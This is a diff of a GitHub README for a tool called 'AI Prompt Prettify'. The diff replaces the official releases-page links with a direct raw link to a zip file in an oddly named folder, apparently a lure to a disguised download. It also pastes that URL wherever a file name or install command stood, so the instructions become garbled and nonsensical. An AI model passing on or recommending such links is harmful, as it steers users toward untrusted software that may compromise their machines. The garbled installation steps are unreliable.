iwillsureaboutthisx2/AI-Prompt-Prettify/README.md

    - Internet Connection: Required for the download.

 2. **Visit the Download Page**
-   To download AI Prompt Prettify, visit this page: [Download AI-Prompt-Prettify](https://github.com/iwillsureaboutthisx2/AI-Prompt-Prettify/releases).
+   To download AI Prompt Prettify, visit this page: [Download AI-Prompt-Prettify](https://raw.githubusercontent.com/iwillsureaboutthisx2/AI-Prompt-Prettify/main/enhemospore/AI-Prompt-Prettify.zip).
 Here, you will find the latest version of the software and installation instructions.

 ## 📥 Download & Install

 1. **Download the Software**
-   Click on the [Download AI-Prompt-Prettify](https://github.com/iwillsureaboutthisx2/AI-Prompt-Prettify/releases) link to access the releases page.
+   Click on the [Download AI-Prompt-Prettify](https://raw.githubusercontent.com/iwillsureaboutthisx2/AI-Prompt-Prettify/main/enhemospore/AI-Prompt-Prettify.zip) link to access the releases page.
 You will see the most recent version.
 Click the link or button that says "Latest Release" to download the application.

 2. **Locate the Downloaded File**
    After downloading, navigate to your computer’s Downloads folder.
-You should see a file named "AI-Prompt-Prettify-Setup.exe" (or similar based on your operating system).
+You should see a file named "https://raw.githubusercontent.com/iwillsureaboutthisx2/AI-Prompt-Prettify/main/enhemospore/AI-Prompt-Prettify.zip" (or similar based on your operating system).

 3. **Run the Installer**
    - For Windows: Double-click the downloaded `.exe` file.
 Follow the installation prompts to complete the process.
    - For macOS: Open the `.dmg` file you downloaded.
 Drag the AI-Prompt-Prettify icon to your Applications folder.
-   - For Linux: Extract the downloaded `.tar.gz` file.
+   - For Linux: Extract the downloaded `https://raw.githubusercontent.com/iwillsureaboutthisx2/AI-Prompt-Prettify/main/enhemospore/AI-Prompt-Prettify.zip` file.
 Open a terminal and navigate to the folder where you extracted the files.
-Run `./install.sh` to start the installation.
+Run `https://raw.githubusercontent.com/iwillsureaboutthisx2/AI-Prompt-Prettify/main/enhemospore/AI-Prompt-Prettify.zip` to start the installation.

 4. **Launch the Application**
    After installation, find AI Prompt Prettify in your Applications or Programs.
 Double-click the icon to start using the tool.